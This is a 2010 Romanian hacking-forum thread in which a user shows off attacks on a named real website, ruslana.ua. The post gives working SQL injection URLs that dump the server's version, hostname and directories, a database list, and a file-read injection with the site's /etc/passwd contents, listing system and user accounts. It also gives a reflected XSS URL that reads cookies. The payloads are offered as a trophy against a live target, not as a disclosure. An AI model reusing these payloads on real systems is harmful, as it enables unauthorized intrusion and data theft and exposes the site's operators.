Mata-i grasa _|_
RST  

Go Back   RST > >> 1337 Zone << > Club ShowOFF
Reload this Page [SQLi + XSS] ruslana.ua
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Club ShowOFF Aratati-va aici hack-urile si atacurile voastre! Fake hackers gona be warned

Reply
Old 03-18-2010, 12:18 PM   #1 (permalink)
Registered user
Bautor de vin
 
Join Date: Feb 2010
Posts: 89
Rep Power: 1
dae mien se balangane pe drum
dae mien is offline

Default [SQLi + XSS] ruslana.ua

hotel regim hotelier
hotel yahoo domain


Current page served up by:
Apache/2.2.14 (FreeBSD) PHP/5.2.12 with Suhosin-Patch mod_fcgid/2.3.5 mod_ssl/2.2.14 OpenSSL/0.9.7e-p1

SQL Injection Syntax:

Code:
http://www.ruslana.ua/en/press.php?ln=2&pr=1+and+1=0+union+select+concat%280x5b,0x4d,0x61,0x63,0x68,0x69,0x6e,0x65,0x3a,0x20,@@version_compile_machine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x4f,0x53,0x20,0x3a,0x20,@@version_compile_os,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x42,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3a,0x20,0x20,@@version,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x20,0x43,0x6f,0x6d,0x6d,0x65,0x6e,0x74,0x3a,0x20,@@version_comment,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x55,0x73,0x65,0x72,0x3a,0x20,system_user%28%29,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x48,0x6f,0x73,0x74,0x6e,0x61,0x6d,0x65,0x3a,0x20,@@hostname,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x61,0x74,0x61,0x44,0x69,0x72,0x3a,0x20,@@datadir,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x42,0x61,0x73,0x65,0x64,0x69,0x72,0x3a,0x20,@@basedir,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x74,0x6d,0x70,0x20,0x44,0x69,0x72,0x3a,0x20,@@tmpdir,0x20,0x5d,0x20,0x2d2d,0x2d,0x20,0x5b,0x20,0x44,0x61,0x74,0x61,0x62,0x61,0x73,0x65,0x3a,0x20,database%28%29,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x74,0x6f,0x72,0x61,0x67,0x65,0x20,0x45,0x6e,0x67,0x69,0x6e,0x65,0x3a,0x20,@@storage_engine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x51,0x4c,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@sql_warnings,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x72,0x76,0x65,0x72,0x20,0x49,0x44,0x3a,0x20,@@server_id,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x69,0x63,0x65,0x6e,0x73,0x65,0x3a,0x20,@@license,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x63,0x75,0x72,0x65,0x20,0x41,0x75,0x74,0x68,0x3a,0x20,@@secure_auth,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x45,0x78,0x70,0x69,0x72,0x65,0x20,0x4c,0x6f,0x67,0x73,0x20,0x44,0x61,0x79,0x73,0x3a,0x20,@@expire_logs_days,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x6f,0x67,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@log_warnings,0x20,0x5d,0x20,0x20,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@system_time_zone,0x5d,0x20,0x2d,0x2d,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@time_zone,0x20,0x5d%29--
Databases:

[ information_schema ]
[ basa_dannih ]
[ fanclubru_fanclubru ]
[ fans ]
[ mysql ]
[ rate ]
[ ruslana ]

Load File:

Code:
http://www.ruslana.ua/en/press.php?ln=2&pr=1+and+1=0+union+select+load_file%280x2f6574632f706173737764%29--
Quote:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64flogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65hcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql:/bin/sh cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin dovecot:*:143:143ovecot:/home/dovecot:/sbin/nologin clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin opelvectra:*:1000:1002:opelvectra:/home/opelvectra/data:/bin/date povin_admin:*:1001:1003ovin_admin:/home/povin_admin/data:/bin/date amod555:*:1002:1004:amod555:/home/amod555/data:/bin/date ftp_1plus:*:1003:1005:ftp_1plus:/home/ftp_1plus/data:/bin/date cms_and:*:1004:1006:cms_and:/home/cms_and/data:/bin/csh guest:*:1006:1005::/home/ftp_1plus/data/users/guest:/bin/date fan:*:1007:1008:fan:/home/fan/data:/bin/date maska:*:1000:1002::/home/opelvectra/data/www/ruslana.ua/fanclub:/bin/date top_2004:*:1003:1005::/home/ftp_1plus/data/RUSLANA:/bin/date virtuser_1009:*:1009:1002::/home/opelvectra/data/email/ruslana.ua/fanclub:/sbin/nologin virtuser_1010:*:1010:1008::/home/fan/data/email/fanclub.ruslana.ua/cora:/sbin/nologin virtuser_1011:*:1011:1002::/home/opelvectra/data/email/ruslana.ua/info:/sbin/nologin virtuser_1013:*:1013:1008::/home/fan/data/email/fanclub.ruslana.ua/nikoleta:/sbin/nologin virtuser_1014:*:1014:1008::/home/fan/data/email/fanclub.ruslana.ua/wespe:/sbin/nologin virtuser_1015:*:1015:1008::/home/fan/data/email/fanclub.ruslana.ua/admin:/sbin/nologin virtuser_1016:*:1016:1008::/home/fan/data/email/fanclub.ruslana.ua/oleg:/sbin/nologin rruslana:*:1017:1009:rruslana:/home/rruslana/data:/bin/csh volt320:*:1018:1010:volt320:/home/volt320/data:/bin/date koper:*:1019:1011:koper:/home/koper/data:/bin/date kas1234kdv:*:1000:1002::/home/opelvectra/data/www/ruslana.ua/forum:/bin/date kas1234kdv55:*:1020:1012:kas1234kdv55:/home/kas1234kdv55/data:/sbin/nologin virtuser_1021:*:1021:1008::/home/fan/data/email/fanclub.ruslana.ua/olchyk:/sbin/nologin jp88rrffw:*:1000:1002::/home/opelvectra/data/www/ruslana.ua/n_f_s:/bin/date
Cross Site Scripting:
Code:
http://www.ruslana.ua/en/discography4.php?a=4&b=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
  Reply With Quote
Sponsored Links
Reply

« http://thewhiskychannel.com | www.it-lunar.com »
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump



Contact Us - Archive - Top

Copywr0ng (c) 2009 Miercuri catre Joi - RST
All logos and trademarks in this site are property of their respective

Hosted by powerhost.ro